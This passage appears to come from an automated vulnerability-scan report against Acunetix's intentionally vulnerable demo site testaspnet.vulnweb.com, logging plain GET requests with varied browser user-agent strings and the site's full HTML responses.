class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Evidence
Show / hide Request and Response
Request Header - size: 493 bytes.	GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:26 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0
Evidence
Show / hide Request and Response
Request Header - size: 456 bytes.	GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:26 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a 